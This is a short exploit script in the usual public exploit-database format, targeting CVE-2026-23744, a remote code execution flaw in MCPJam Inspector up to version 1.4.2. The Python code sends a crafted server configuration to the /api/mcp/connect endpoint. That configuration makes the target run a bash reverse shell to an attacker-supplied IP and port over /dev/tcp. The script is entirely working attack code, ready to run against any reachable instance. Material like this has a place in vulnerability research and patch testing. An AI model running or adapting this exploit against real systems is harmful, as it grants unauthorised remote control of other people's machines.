# Exploit Title: MCPJam Inspector - Remote Code Execution # Date: 07/03/2026 # Exploit Author: Diamorphine # Vendor Homepage: https://www.mcpjam.com/ # Software Link: https://github.com/MCPJam # Version: <=1.4.2 # Tested on: Debian # CVE : CVE-2026-23744 import asyncio import httpx import argparse from urllib.parse import urljoin async def main(attacker_ip, attacker_port, url): async with httpx.AsyncClient(verify=False) as client: data = { "serverConfig": { "command": "bash", "args": ["-c", f"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1"], "env": {} }, "serverId": "Hello666" } ready_url = urljoin(url, "/api/mcp/connect") r = await client.post(url=ready_url, json=data) print(r.text) parser = argparse.ArgumentParser(description="Exploit for CVE-2026-23744 MCPJam Inspector - Remote Code Execution") parser.add_argument("-u", "--url", required=True, help="Target host. e.g. http://127.0.0.1:8080") parser.add_argument("-l", "--lhost", required=True, help="Attacker ip") parser.add_argument("-p", "--lport", required=True, help="Attacker port") args = parser.parse_args() if __name__ == '__main__': asyncio.run(main(args.lhost, args.lport, args.url))